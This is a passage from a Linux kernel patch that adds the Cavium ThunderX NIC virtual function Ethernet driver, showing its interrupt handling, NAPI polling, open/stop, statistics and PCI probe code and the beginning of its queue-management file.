CQE_TYPE_SEND); + break; + case CQE_TYPE_INVALID: + case CQE_TYPE_RX_SPLIT: + case CQE_TYPE_RX_TCP: + case CQE_TYPE_SEND_PTP: + /* Ignore for now */ + break; + } + processed_cqe++; + } + netdev_dbg(nic->netdev, "%s processed_cqe %d work_done %d budget %d\n", + __func__, processed_cqe, work_done, budget); + + /* Ring doorbell to inform H/W to reuse processed CQEs */ + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_DOOR, + cq_idx, processed_cqe); + + if ((work_done < budget) && napi) + goto loop; + +done: + spin_unlock_bh(&cq->lock); + return work_done; +} + +static int nicvf_poll(struct napi_struct *napi, int budget) +{ + u64 cq_head; + int work_done = 0; + struct net_device *netdev = napi->dev; + struct nicvf *nic = netdev_priv(netdev); + struct nicvf_cq_poll *cq; + struct netdev_queue *txq; + + cq = container_of(napi, struct nicvf_cq_poll, napi); + work_done = nicvf_cq_intr_handler(netdev, cq->cq_idx, napi, budget); + + txq = netdev_get_tx_queue(netdev, cq->cq_idx); + if (netif_tx_queue_stopped(txq)) + netif_tx_wake_queue(txq); + + if (work_done < budget) { + /* Slow packet rate, exit polling */ + napi_complete(napi); + /* Re-enable interrupts */ + cq_head = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_HEAD, + cq->cq_idx); + nicvf_clear_intr(nic, NICVF_INTR_CQ, cq->cq_idx); + nicvf_queue_reg_write(nic, NIC_QSET_CQ_0_7_HEAD, + cq->cq_idx, cq_head); + nicvf_enable_intr(nic, NICVF_INTR_CQ, cq->cq_idx); + } + return work_done; +} + +/* Qset error interrupt handler + * + * As of now only CQ errors are handled + */ +void nicvf_handle_qs_err(unsigned long data) +{ + struct nicvf *nic = (struct nicvf *)data; + struct queue_set *qs = nic->qs; + int qidx; + u64 status; + + netif_tx_disable(nic->netdev); + + /* Check if it is CQ err */ + for (qidx = 0; qidx < qs->cq_cnt; qidx++) { + status = nicvf_queue_reg_read(nic, NIC_QSET_CQ_0_7_STATUS, + qidx); + if (!(status & CQ_ERR_MASK)) + continue; + /* Process already queued CQEs and reconfig CQ */ + nicvf_disable_intr(nic, NICVF_INTR_CQ, qidx); + nicvf_sq_disable(nic, qidx); + nicvf_cq_intr_handler(nic->netdev, qidx, NULL, 0); + nicvf_cmp_queue_config(nic, qs, qidx, true); + nicvf_sq_free_used_descs(nic->netdev, &qs->sq[qidx], qidx); + nicvf_sq_enable(nic, &qs->sq[qidx], qidx); + + nicvf_enable_intr(nic, NICVF_INTR_CQ, qidx); + } + + netif_tx_start_all_queues(nic->netdev); + /* Re-enable Qset error interrupt */ + nicvf_enable_intr(nic, NICVF_INTR_QS_ERR, 0); +} + +static irqreturn_t nicvf_misc_intr_handler(int irq, void *nicvf_irq) +{ + struct nicvf *nic = (struct nicvf *)nicvf_irq; + u64 intr; + + intr = nicvf_reg_read(nic, NIC_VF_INT); + /* Check for spurious interrupt */ + if (!(intr & NICVF_INTR_MBOX_MASK)) + return IRQ_HANDLED; + + nicvf_handle_mbx_intr(nic); + + return IRQ_HANDLED; +} + +static irqreturn_t nicvf_intr_handler(int irq, void *nicvf_irq) +{ + u64 qidx, intr, clear_intr = 0; + u64 cq_intr, rbdr_intr, qs_err_intr; + struct nicvf *nic = (struct nicvf *)nicvf_irq; + struct queue_set *qs = nic->qs; + struct nicvf_cq_poll *cq_poll = NULL; + + intr = nicvf_reg_read(nic, NIC_VF_INT); + if (netif_msg_intr(nic)) + netdev_info(nic->netdev, "%s: interrupt status 0x%llx\n", + nic->netdev->name, intr); + + qs_err_intr = intr & NICVF_INTR_QS_ERR_MASK; + if (qs_err_intr) { + /* Disable Qset err interrupt and schedule softirq */ + nicvf_disable_intr(nic, NICVF_INTR_QS_ERR, 0); + tasklet_hi_schedule(&nic->qs_err_task); + clear_intr |= qs_err_intr; + } + + /* Disable interrupts and start polling */ + cq_intr = (intr & NICVF_INTR_CQ_MASK) >> NICVF_INTR_CQ_SHIFT; + for (qidx = 0; qidx < qs->cq_cnt; qidx++) { + if (!(cq_intr & (1 << qidx))) + continue; + if (!nicvf_is_intr_enabled(nic, NICVF_INTR_CQ, qidx)) + continue; + + nicvf_disable_intr(nic, NICVF_INTR_CQ, qidx); + clear_intr |= ((1 << qidx) << NICVF_INTR_CQ_SHIFT); + + cq_poll = nic->napi[qidx]; + /* Schedule NAPI */ + if (cq_poll) + napi_schedule(&cq_poll->napi); + } + + /* Handle RBDR interrupts */ + rbdr_intr = (intr & NICVF_INTR_RBDR_MASK) >> NICVF_INTR_RBDR_SHIFT; + if (rbdr_intr) { + /* Disable RBDR interrupt and schedule softirq */ + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) { + if (!nicvf_is_intr_enabled(nic, NICVF_INTR_RBDR, qidx)) + continue; + nicvf_disable_intr(nic, NICVF_INTR_RBDR, qidx); + tasklet_hi_schedule(&nic->rbdr_task); + clear_intr |= ((1 << qidx) << NICVF_INTR_RBDR_SHIFT); + } + } + + /* Clear interrupts */ + nicvf_reg_write(nic, NIC_VF_INT, clear_intr); + return IRQ_HANDLED; +} + +static int nicvf_enable_msix(struct nicvf *nic) +{ + int ret, vec; + + nic->num_vec = NIC_VF_MSIX_VECTORS; + + for (vec = 0; vec < nic->num_vec; vec++) + nic->msix_entries[vec].entry = vec; + + ret = pci_enable_msix(nic->pdev, nic->msix_entries, nic->num_vec); + if (ret) { + netdev_err(nic->netdev, + "Req for #%d msix vectors failed\n", nic->num_vec); + return 0; + } + nic->msix_enabled = 1; + return 1; +} + +static void nicvf_disable_msix(struct nicvf *nic) +{ + if (nic->msix_enabled) { + pci_disable_msix(nic->pdev); + nic->msix_enabled = 0; + nic->num_vec = 0; + } +} + +static int nicvf_register_interrupts(struct nicvf *nic) +{ + int irq, free, ret = 0; + int vector; + + for_each_cq_irq(irq) + sprintf(nic->irq_name[irq], "NICVF%d CQ%d", + nic->vf_id, irq); + + for_each_sq_irq(irq) + sprintf(nic->irq_name[irq], "NICVF%d SQ%d", + nic->vf_id, irq - NICVF_INTR_ID_SQ); + + for_each_rbdr_irq(irq) + sprintf(nic->irq_name[irq], "NICVF%d RBDR%d", + nic->vf_id, irq - NICVF_INTR_ID_RBDR); + + /* Register all interrupts except mailbox */ + for (irq = 0; irq < NICVF_INTR_ID_SQ; irq++) { + vector = nic->msix_entries[irq].vector; + ret = request_irq(vector, nicvf_intr_handler, + 0, nic->irq_name[irq], nic); + if (ret) + break; + nic->irq_allocated[irq] = true; + } + + for (irq = NICVF_INTR_ID_SQ; irq < NICVF_INTR_ID_MISC; irq++) { + vector = nic->msix_entries[irq].vector; + ret = request_irq(vector, nicvf_intr_handler, + 0, nic->irq_name[irq], nic); + if (ret) + break; + nic->irq_allocated[irq] = true; + } + + sprintf(nic->irq_name[NICVF_INTR_ID_QS_ERR], + "NICVF%d Qset error", nic->vf_id); + if (!ret) { + vector = nic->msix_entries[NICVF_INTR_ID_QS_ERR].vector; + irq = NICVF_INTR_ID_QS_ERR; + ret = request_irq(vector, nicvf_intr_handler, + 0, nic->irq_name[irq], nic); + if (!ret) + nic->irq_allocated[irq] = true; + } + + if (ret) { + netdev_err(nic->netdev, "Request irq failed\n"); + for (free = 0; free < irq; free++) + free_irq(nic->msix_entries[free].vector, nic); + return ret; + } + + return 0; +} + +static void nicvf_unregister_interrupts(struct nicvf *nic) +{ + int irq; + + /* Free registered interrupts */ + for (irq = 0; irq < nic->num_vec; irq++) { + if (nic->irq_allocated[irq]) + free_irq(nic->msix_entries[irq].vector, nic); + nic->irq_allocated[irq] = false; + } + + /* Disable MSI-X */ + nicvf_disable_msix(nic); +} + +/* Initialize MSIX vectors and register MISC interrupt. + * Send READY message to PF to check if its alive + */ +static int nicvf_register_misc_interrupt(struct nicvf *nic) +{ + int ret = 0; + int irq = NICVF_INTR_ID_MISC; + + /* Return if mailbox interrupt is already registered */ + if (nic->msix_enabled) + return 0; + + /* Enable MSI-X */ + if (!nicvf_enable_msix(nic)) + return 1; + + sprintf(nic->irq_name[irq], "%s Mbox", "NICVF"); + /* Register Misc interrupt */ + ret = request_irq(nic->msix_entries[irq].vector, + nicvf_misc_intr_handler, 0, nic->irq_name[irq], nic); + + if (ret) + return ret; + nic->irq_allocated[irq] = true; + + /* Enable mailbox interrupt */ + nicvf_enable_intr(nic, NICVF_INTR_MBOX, 0); + + /* Check if VF is able to communicate with PF */ + if (!nicvf_check_pf_ready(nic)) { + nicvf_disable_intr(nic, NICVF_INTR_MBOX, 0); + nicvf_unregister_interrupts(nic); + return 1; + } + + return 0; +} + +static netdev_tx_t nicvf_xmit(struct sk_buff *skb, struct net_device *netdev) +{ + struct nicvf *nic = netdev_priv(netdev); + int qid = skb_get_queue_mapping(skb); + struct netdev_queue *txq = netdev_get_tx_queue(netdev, qid); + + /* Check for minimum packet length */ + if (skb->len <= ETH_HLEN) { + dev_kfree_skb(skb); + return NETDEV_TX_OK; + } + + if (!nicvf_sq_append_skb(nic, skb) && !netif_tx_queue_stopped(txq)) { + netif_tx_stop_queue(txq); + nic->drv_stats.tx_busy++; + if (netif_msg_tx_err(nic)) + netdev_warn(netdev, + "%s: Transmit ring full, stopping SQ%d\n", + netdev->name, qid); + + return NETDEV_TX_BUSY; + } + + return NETDEV_TX_OK; +} + +int nicvf_stop(struct net_device *netdev) +{ + int irq, qidx; + struct nicvf *nic = netdev_priv(netdev); + struct queue_set *qs = nic->qs; + struct nicvf_cq_poll *cq_poll = NULL; + union nic_mbx mbx = {}; + + mbx.msg.msg = NIC_MBOX_MSG_SHUTDOWN; + nicvf_send_msg_to_pf(nic, &mbx); + + netif_carrier_off(netdev); + netif_tx_disable(netdev); + + /* Disable RBDR & QS error interrupts */ + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) { + nicvf_disable_intr(nic, NICVF_INTR_RBDR, qidx); + nicvf_clear_intr(nic, NICVF_INTR_RBDR, qidx); + } + nicvf_disable_intr(nic, NICVF_INTR_QS_ERR, 0); + nicvf_clear_intr(nic, NICVF_INTR_QS_ERR, 0); + + /* Wait for pending IRQ handlers to finish */ + for (irq = 0; irq < nic->num_vec; irq++) + synchronize_irq(nic->msix_entries[irq].vector); + + tasklet_kill(&nic->rbdr_task); + tasklet_kill(&nic->qs_err_task); + if (nic->rb_work_scheduled) + cancel_delayed_work_sync(&nic->rbdr_work); + + for (qidx = 0; qidx < nic->qs->cq_cnt; qidx++) { + cq_poll = nic->napi[qidx]; + if (!cq_poll) + continue; + nic->napi[qidx] = NULL; + napi_synchronize(&cq_poll->napi); + /* CQ intr is enabled while napi_complete, + * so disable it now + */ + nicvf_disable_intr(nic, NICVF_INTR_CQ, qidx); + nicvf_clear_intr(nic, NICVF_INTR_CQ, qidx); + napi_disable(&cq_poll->napi); + netif_napi_del(&cq_poll->napi); + kfree(cq_poll); + } + + /* Free resources */ + nicvf_config_data_transfer(nic, false); + + /* Disable HW Qset */ + nicvf_qset_config(nic, false); + + /* disable mailbox interrupt */ + nicvf_disable_intr(nic, NICVF_INTR_MBOX, 0); + + nicvf_unregister_interrupts(nic); + + return 0; +} + +int nicvf_open(struct net_device *netdev) +{ + int err, qidx; + struct nicvf *nic = netdev_priv(netdev); + struct queue_set *qs = nic->qs; + struct nicvf_cq_poll *cq_poll = NULL; + + nic->mtu = netdev->mtu; + + netif_carrier_off(netdev); + + err = nicvf_register_misc_interrupt(nic); + if (err) + return err; + + /* Register NAPI handler for processing CQEs */ + for (qidx = 0; qidx < qs->cq_cnt; qidx++) { + cq_poll = kzalloc(sizeof(*cq_poll), GFP_KERNEL); + if (!cq_poll) { + err = -ENOMEM; + goto napi_del; + } + cq_poll->cq_idx = qidx; + netif_napi_add(netdev, &cq_poll->napi, nicvf_poll, + NAPI_POLL_WEIGHT); + napi_enable(&cq_poll->napi); + nic->napi[qidx] = cq_poll; + } + + /* Check if we got MAC address from PF or else generate a radom MAC */ + if (is_zero_ether_addr(netdev->dev_addr)) { + eth_hw_addr_random(netdev); + nicvf_hw_set_mac_addr(nic, netdev); + } + + /* Init tasklet for handling Qset err interrupt */ + tasklet_init(&nic->qs_err_task, nicvf_handle_qs_err, + (unsigned long)nic); + + /* Init RBDR tasklet which will refill RBDR */ + tasklet_init(&nic->rbdr_task, nicvf_rbdr_task, + (unsigned long)nic); + INIT_DELAYED_WORK(&nic->rbdr_work, nicvf_rbdr_work); + + /* Configure CPI alorithm */ + nic->cpi_alg = cpi_alg; + nicvf_config_cpi(nic); + + /* Configure receive side scaling */ + nicvf_rss_init(nic); + + err = nicvf_register_interrupts(nic); + if (err) + goto cleanup; + + /* Initialize the queues */ + err = nicvf_init_resources(nic); + if (err) + goto cleanup; + + /* Make sure queue initialization is written */ + wmb(); + + nicvf_reg_write(nic, NIC_VF_INT, -1); + /* Enable Qset err interrupt */ + nicvf_enable_intr(nic, NICVF_INTR_QS_ERR, 0); + + /* Enable completion queue interrupt */ + for (qidx = 0; qidx < qs->cq_cnt; qidx++) + nicvf_enable_intr(nic, NICVF_INTR_CQ, qidx); + + /* Enable RBDR threshold interrupt */ + for (qidx = 0; qidx < qs->rbdr_cnt; qidx++) + nicvf_enable_intr(nic, NICVF_INTR_RBDR, qidx); + + netif_carrier_on(netdev); + netif_tx_start_all_queues(netdev); + + return 0; +cleanup: + nicvf_disable_intr(nic, NICVF_INTR_MBOX, 0); + nicvf_unregister_interrupts(nic); +napi_del: + for (qidx = 0; qidx < qs->cq_cnt; qidx++) { + cq_poll = nic->napi[qidx]; + if (!cq_poll) + continue; + napi_disable(&cq_poll->napi); + netif_napi_del(&cq_poll->napi); + kfree(cq_poll); + nic->napi[qidx] = NULL; + } + return err; +} + +static int nicvf_update_hw_max_frs(struct nicvf *nic, int mtu) +{ + union nic_mbx mbx = {}; + + mbx.frs.msg = NIC_MBOX_MSG_SET_MAX_FRS; + mbx.frs.max_frs = mtu; + mbx.frs.vf_id = nic->vf_id; + + return nicvf_send_msg_to_pf(nic, &mbx); +} + +static int nicvf_change_mtu(struct net_device *netdev, int new_mtu) +{ + struct nicvf *nic = netdev_priv(netdev); + + if (new_mtu > NIC_HW_MAX_FRS) + return -EINVAL; + + if (new_mtu < NIC_HW_MIN_FRS) + return -EINVAL; + + if (nicvf_update_hw_max_frs(nic, new_mtu)) + return -EINVAL; + netdev->mtu = new_mtu; + nic->mtu = new_mtu; + + return 0; +} + +static int nicvf_set_mac_address(struct net_device *netdev, void *p) +{ + struct sockaddr *addr = p; + struct nicvf *nic = netdev_priv(netdev); + + if (!is_valid_ether_addr(addr->sa_data)) + return -EADDRNOTAVAIL; + + memcpy(netdev->dev_addr, addr->sa_data, netdev->addr_len); + + if (nic->msix_enabled) + if (nicvf_hw_set_mac_addr(nic, netdev)) + return -EBUSY; + + return 0; +} + +static void nicvf_read_bgx_stats(struct nicvf *nic, struct bgx_stats_msg *bgx) +{ + if (bgx->rx) + nic->bgx_stats.rx_stats[bgx->idx] = bgx->stats; + else + nic->bgx_stats.tx_stats[bgx->idx] = bgx->stats; +} + +void nicvf_update_lmac_stats(struct nicvf *nic) +{ + int stat = 0; + union nic_mbx mbx = {}; + int timeout; + + if (!netif_running(nic->netdev)) + return; + + mbx.bgx_stats.msg = NIC_MBOX_MSG_BGX_STATS; + mbx.bgx_stats.vf_id = nic->vf_id; + /* Rx stats */ + mbx.bgx_stats.rx = 1; + while (stat < BGX_RX_STATS_COUNT) { + nic->bgx_stats_acked = 0; + mbx.bgx_stats.idx = stat; + nicvf_send_msg_to_pf(nic, &mbx); + timeout = 0; + while ((!nic->bgx_stats_acked) && (timeout < 10)) { + msleep(2); + timeout++; + } + stat++; + } + + stat = 0; + + /* Tx stats */ + mbx.bgx_stats.rx = 0; + while (stat < BGX_TX_STATS_COUNT) { + nic->bgx_stats_acked = 0; + mbx.bgx_stats.idx = stat; + nicvf_send_msg_to_pf(nic, &mbx); + timeout = 0; + while ((!nic->bgx_stats_acked) && (timeout < 10)) { + msleep(2); + timeout++; + } + stat++; + } +} + +void nicvf_update_stats(struct nicvf *nic) +{ + int qidx; + struct nicvf_hw_stats *stats = &nic->stats; + struct nicvf_drv_stats *drv_stats = &nic->drv_stats; + struct queue_set *qs = nic->qs; + +#define GET_RX_STATS(reg) \ + nicvf_reg_read(nic, NIC_VNIC_RX_STAT_0_13 | (reg << 3)) +#define GET_TX_STATS(reg) \ + nicvf_reg_read(nic, NIC_VNIC_TX_STAT_0_4 | (reg << 3)) + + stats->rx_bytes_ok = GET_RX_STATS(RX_OCTS); + stats->rx_ucast_frames_ok = GET_RX_STATS(RX_UCAST); + stats->rx_bcast_frames_ok = GET_RX_STATS(RX_BCAST); + stats->rx_mcast_frames_ok = GET_RX_STATS(RX_MCAST); + stats->rx_fcs_errors = GET_RX_STATS(RX_FCS); + stats->rx_l2_errors = GET_RX_STATS(RX_L2ERR); + stats->rx_drop_red = GET_RX_STATS(RX_RED); + stats->rx_drop_overrun = GET_RX_STATS(RX_ORUN); + stats->rx_drop_bcast = GET_RX_STATS(RX_DRP_BCAST); + stats->rx_drop_mcast = GET_RX_STATS(RX_DRP_MCAST); + stats->rx_drop_l3_bcast = GET_RX_STATS(RX_DRP_L3BCAST); + stats->rx_drop_l3_mcast = GET_RX_STATS(RX_DRP_L3MCAST); + + stats->tx_bytes_ok = GET_TX_STATS(TX_OCTS); + stats->tx_ucast_frames_ok = GET_TX_STATS(TX_UCAST); + stats->tx_bcast_frames_ok = GET_TX_STATS(TX_BCAST); + stats->tx_mcast_frames_ok = GET_TX_STATS(TX_MCAST); + stats->tx_drops = GET_TX_STATS(TX_DROP); + + drv_stats->rx_frames_ok = stats->rx_ucast_frames_ok + + stats->rx_bcast_frames_ok + + stats->rx_mcast_frames_ok; + drv_stats->tx_frames_ok = stats->tx_ucast_frames_ok + + stats->tx_bcast_frames_ok + + stats->tx_mcast_frames_ok; + drv_stats->rx_drops = stats->rx_drop_red + + stats->rx_drop_overrun; + drv_stats->tx_drops = stats->tx_drops; + + /* Update RQ and SQ stats */ + for (qidx = 0; qidx < qs->rq_cnt; qidx++) + nicvf_update_rq_stats(nic, qidx); + for (qidx = 0; qidx < qs->sq_cnt; qidx++) + nicvf_update_sq_stats(nic, qidx); +} + +struct rtnl_link_stats64 *nicvf_get_stats64(struct net_device *netdev, + struct rtnl_link_stats64 *stats) +{ + struct nicvf *nic = netdev_priv(netdev); + struct nicvf_hw_stats *hw_stats = &nic->stats; + struct nicvf_drv_stats *drv_stats = &nic->drv_stats; + + nicvf_update_stats(nic); + + stats->rx_bytes = hw_stats->rx_bytes_ok; + stats->rx_packets = drv_stats->rx_frames_ok; + stats->rx_dropped = drv_stats->rx_drops; + + stats->tx_bytes = hw_stats->tx_bytes_ok; + stats->tx_packets = drv_stats->tx_frames_ok; + stats->tx_dropped = drv_stats->tx_drops; + + return stats; +} + +static void nicvf_tx_timeout(struct net_device *dev) +{ + struct nicvf *nic = netdev_priv(dev); + + if (netif_msg_tx_err(nic)) + netdev_warn(dev, "%s: Transmit timed out, resetting\n", + dev->name); + + schedule_work(&nic->reset_task); +} + +static void nicvf_reset_task(struct work_struct *work) +{ + struct nicvf *nic; + + nic = container_of(work, struct nicvf, reset_task); + + if (!netif_running(nic->netdev)) + return; + + nicvf_stop(nic->netdev); + nicvf_open(nic->netdev); + nic->netdev->trans_start = jiffies; +} + +static const struct net_device_ops nicvf_netdev_ops = { + .ndo_open = nicvf_open, + .ndo_stop = nicvf_stop, + .ndo_start_xmit = nicvf_xmit, + .ndo_change_mtu = nicvf_change_mtu, + .ndo_set_mac_address = nicvf_set_mac_address, + .ndo_get_stats64 = nicvf_get_stats64, + .ndo_tx_timeout = nicvf_tx_timeout, +}; + +static int nicvf_probe(struct pci_dev *pdev, const struct pci_device_id *ent) +{ + struct device *dev = &pdev->dev; + struct net_device *netdev; + struct nicvf *nic; + struct queue_set *qs; + int err; + + err = pci_enable_device(pdev); + if (err) { + dev_err(dev, "Failed to enable PCI device\n"); + return err; + } + + err = pci_request_regions(pdev, DRV_NAME); + if (err) { + dev_err(dev, "PCI request regions failed 0x%x\n", err); + goto err_disable_device; + } + + err = pci_set_dma_mask(pdev, DMA_BIT_MASK(48)); + if (err) { + dev_err(dev, "Unable to get usable DMA configuration\n"); + goto err_release_regions; + } + + err = pci_set_consistent_dma_mask(pdev, DMA_BIT_MASK(48)); + if (err) { + dev_err(dev, "unable to get 48-bit DMA for consistent allocations\n"); + goto err_release_regions; + } + + netdev = alloc_etherdev_mqs(sizeof(struct nicvf), + MAX_RCV_QUEUES_PER_QS, + MAX_SND_QUEUES_PER_QS); + if (!netdev) { + err = -ENOMEM; + goto err_release_regions; + } + + pci_set_drvdata(pdev, netdev); + + SET_NETDEV_DEV(netdev, &pdev->dev); + + nic = netdev_priv(netdev); + nic->netdev = netdev; + nic->pdev = pdev; + + /* MAP VF's configuration registers */ + nic->reg_base = pcim_iomap(pdev, PCI_CFG_REG_BAR_NUM, 0); + if (!nic->reg_base) { + dev_err(dev, "Cannot map config register space, aborting\n"); + err = -ENOMEM; + goto err_free_netdev; + } + + err = nicvf_set_qset_resources(nic); + if (err) + goto err_free_netdev; + + qs = nic->qs; + + err = nicvf_set_real_num_queues(netdev, qs->sq_cnt, qs->rq_cnt); + if (err) + goto err_free_netdev; + + /* Check if PF is alive and get MAC address for this VF */ + err = nicvf_register_misc_interrupt(nic); + if (err) + goto err_free_netdev; + + netdev->features |= (NETIF_F_RXCSUM | NETIF_F_IP_CSUM | NETIF_F_SG | + NETIF_F_TSO | NETIF_F_GRO); + netdev->hw_features = netdev->features; + + netdev->netdev_ops = &nicvf_netdev_ops; + + INIT_WORK(&nic->reset_task, nicvf_reset_task); + + err = register_netdev(netdev); + if (err) { + dev_err(dev, "Failed to register netdevice\n"); + goto err_unregister_interrupts; + } + + nic->msg_enable = debug; + + nicvf_set_ethtool_ops(netdev); + + return 0; + +err_unregister_interrupts: + nicvf_unregister_interrupts(nic); +err_free_netdev: + pci_set_drvdata(pdev, NULL); + free_netdev(netdev); +err_release_regions: + pci_release_regions(pdev); +err_disable_device: + pci_disable_device(pdev); + return err; +} + +static void nicvf_remove(struct pci_dev *pdev) +{ + struct net_device *netdev = pci_get_drvdata(pdev); + struct nicvf *nic = netdev_priv(netdev); + + unregister_netdev(netdev); + nicvf_unregister_interrupts(nic); + pci_set_drvdata(pdev, NULL); + free_netdev(netdev); + pci_release_regions(pdev); + pci_disable_device(pdev); +} + +static struct pci_driver nicvf_driver = { + .name = DRV_NAME, + .id_table = nicvf_id_table, + .probe = nicvf_probe, + .remove = nicvf_remove, +}; + +static int __init nicvf_init_module(void) +{ + pr_info("%s, ver %s\n", DRV_NAME, DRV_VERSION); + + return pci_register_driver(&nicvf_driver); +} + +static void __exit nicvf_cleanup_module(void) +{ + pci_unregister_driver(&nicvf_driver); +} + +module_init(nicvf_init_module); +module_exit(nicvf_cleanup_module); diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_queues.c b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c new file mode 100644 index 000000000000..196246665444 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nicvf_queues.c @@ -0,0 +1,1544 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#include +#include +#include +#include +#include +#include + +#include "nic_reg.h" +#include "nic.h" +#include "q_struct.h" +#include "nicvf_queues.h" + +struct rbuf_info { + struct page *page; + void *data; + u64 offset; +}; + +#define GET_RBUF_INFO(x) ((struct rbuf_info *)(x - NICVF_RCV_BUF_ALIGN_BYTES)) + +/* Poll a register for a specific value */ +static int nicvf_poll_reg(struct nicvf *nic, int qidx, + u64 reg, int bit_pos, int bits, int val) +{ + u64 bit_mask; + u64 reg_val; + int timeout = 10; + + bit_mask = (1ULL << bits) - 1; + bit_mask = (bit_mask << bit_pos); + + while (timeout) { + reg_val = nicvf_queue_reg_read(nic, reg, qidx); + if (((reg_val & bit_mask) >> bit_pos) == val) + return 0; + usleep_range(1000, 2000); + timeout--; + } + netdev_err(nic->netdev, "Poll on reg 0x%llx failed\n", reg); + return 1; +} + +/* Allocate memory for a queue's descriptors */ +static int nicvf_alloc_q_desc_mem(struct nicvf *nic, struct q_desc_mem *dmem, + int q_len, int desc_size, int align_bytes) +{ + dmem->q_len = q_len; + dmem->size = (desc_size * q_len) + align_bytes; + /* Save address, need it while freeing */ + dmem->unalign_base = dma_zalloc_coherent(&nic->pdev->dev, dmem->size, + &dmem->dma, GFP_KERNEL); + if (!dmem->unalign_base) + return -ENOMEM; + + /* Align memory address for 'align_bytes' */ + dmem->phys_base = NICVF_ALIGNED_ADDR((u64)dmem->dma, align_bytes); + dmem->base = (void *)((u8 *)dmem->unalign_base + + (dmem->phys_base - dmem->dma)); + return 0; +} + +/* Free queue's descriptor memory */ +static void nicvf_free_q_desc_mem(struct nicvf *nic, struct q_desc_mem *dmem) +{ + if (!dmem) + return; + + dma_free_coherent(&nic->pdev->dev, dmem->size, + dmem->unalign_base, dmem->dma); + dmem->unalign_base = NULL; + dmem->base = NULL; +} + +/* Allocate buffer for packet reception + * HW returns memory address where packet is DMA'ed but not a pointer + * into RBDR ring, so save buffer address at the start of fragment and + * align the start address to a cache aligned address + */ +static inline int nicvf_alloc_rcv_buffer(struct nicvf *nic, gfp_t gfp, + u32 buf_len, u64 **rbuf) +{ + u64 data; + struct rbuf_info *rinfo; + int order = get_order(buf_len); + + /* Check if request can be accomodated in previous allocated page */ + if (nic->rb_page) { + if ((nic->rb_page_offset + buf_len + buf_len) > + (PAGE_SIZE << order)) { + nic->rb_page = NULL; + } else { + nic->rb_page_offset += buf_len; + get_page(nic->rb_page); + } + } + + /* Allocate a new page */ + if (!nic->rb_page) { + nic->rb_page = alloc_pages(gfp | __GFP_COMP, order); + if (!nic->rb_page) { + netdev_err(nic->netdev, "Failed to allocate new rcv buffer\n"); + return -ENOMEM; + } + nic->rb_page_offset = 0; + } + + data = (u64)page_address(nic->rb_page) + nic->rb_page_offset; + + /* Align buffer addr to cache line i.e 128 bytes */ + rinfo = (struct rbuf_info *)(data + NICVF_RCV_BUF_ALIGN_LEN(data)); + /* Save page address for reference updation */ + rinfo->page = nic->rb_page; + /* Store start address for later retrieval */ + rinfo->data = (void *)data; + /* Store alignment offset */ + rinfo->offset = NICVF_RCV_BUF_ALIGN_LEN(data); + + data += rinfo->offset; + + /* Give next aligned address to hw for DMA */ + *rbuf = (u64 *)(data + NICVF_RCV_BUF_ALIGN_BYTES); + return 0; +} + +/* Retrieve actual buffer start address and build skb for received packet */ +static struct sk_buff *nicvf_rb_ptr_to_skb(struct nicvf *nic, + u64 rb_ptr, int len) +{ + struct sk_buff *skb; + struct rbuf_info *rinfo; + + rb_ptr = (u64)phys_to_virt(rb_ptr); + /* Get buffer start address and alignment offset */ + rinfo = GET_RBUF_INFO(rb_ptr); + + /* Now build an skb to give to stack */ + skb = build_skb(rinfo->data, RCV_FRAG_LEN); + if (!skb) { + put_page(rinfo->page); + return NULL; + } + + /* Set correct skb->data */ + skb_reserve(skb, rinfo->offset + NICVF_RCV_BUF_ALIGN_BYTES); + + prefetch((void *)rb_ptr); + return skb; +} + +/* Allocate RBDR ring and populate receive buffers */ +static int nicvf_init_rbdr(struct nicvf *nic, struct rbdr *rbdr, + int ring_len, int buf_size) +{ + int idx; + u64 *rbuf; + struct rbdr_entry_t *desc; + int err; + + err = nicvf_alloc_q_desc_mem(nic, &rbdr->dmem, ring_len, + sizeof(struct rbdr_entry_t), + NICVF_RCV_BUF_ALIGN_BYTES); + if (err) + return err; + + rbdr->desc = rbdr->dmem.base; + /* Buffer size has to be in multiples of 128 bytes */ + rbdr->dma_size = buf_size; + rbdr->enable = true; + rbdr->thresh = RBDR_THRESH; + + nic->rb_page = NULL; + for (idx = 0; idx < ring_len; idx++) { + err = nicvf_alloc_rcv_buffer(nic, GFP_KERNEL, RCV_FRAG_LEN, + &rbuf); + if (err) + return err; + + desc = GET_RBDR_DESC(rbdr, idx); + desc->buf_addr = virt_to_phys(rbuf) >> NICVF_RCV_BUF_ALIGN; + } + return 0; +} + +/* Free RBDR ring and its receive buffers */ +static void nicvf_free_rbdr(struct nicvf *nic, struct rbdr *rbdr) +{ + int head, tail; + u64 buf_addr; + struct rbdr_entry_t *desc; + struct rbuf_info *rinfo; + + if (!rbdr) + return; + + rbdr->enable = false; + if (!rbdr->dmem.base) + return; + + head = rbdr->head; + tail = rbdr->tail; + + /* Free SKBs */ + while (head != tail) { + desc = GET_RBDR_DESC(rbdr, head); + buf_addr = desc->buf_addr << NICVF_RCV_BUF_ALIGN; + rinfo = GET_RBUF_INFO((u64)phys_to_virt(buf_addr)); + put_page(rinfo->page); + head++; + head &= (rbdr->dmem.q_len - 1); + } + /* Free SKB of tail desc */ + desc = GET_RBDR_DESC(rbdr, tail); + buf_addr = desc->buf_addr << NICVF_RCV_BUF_ALIGN; + rinfo = GET_RBUF_INFO((u64)phys_to_virt(buf_addr)); + put_page(rinfo->page); + + /* Free RBDR ring */ + nicvf_free_q_desc_mem(nic, &rbdr->dmem); +} + +/* Refill receive buffer descriptors with new buffers. + */ +void nicvf_refill_rbdr(struct nicvf *nic, gfp_t gfp) +{ + struct queue_set *qs = nic->qs; + int rbdr_idx = qs->rbdr_cnt; + int tail, qcount; + int refill_rb_cnt; + struct rbdr *rbdr; + struct rbdr_entry_t *desc; + u64 *rbuf; + int new_rb = 0; + +refill: + if (!rbdr_idx) + return; + rbdr_idx--; + rbdr = &qs->rbdr[rbdr_idx]; + /* Check if it's enabled */ + if (!rbdr->enable) + goto next_rbdr; + + /* Get no of desc's to be refilled */ + qcount = nicvf_queue_reg_read(nic, 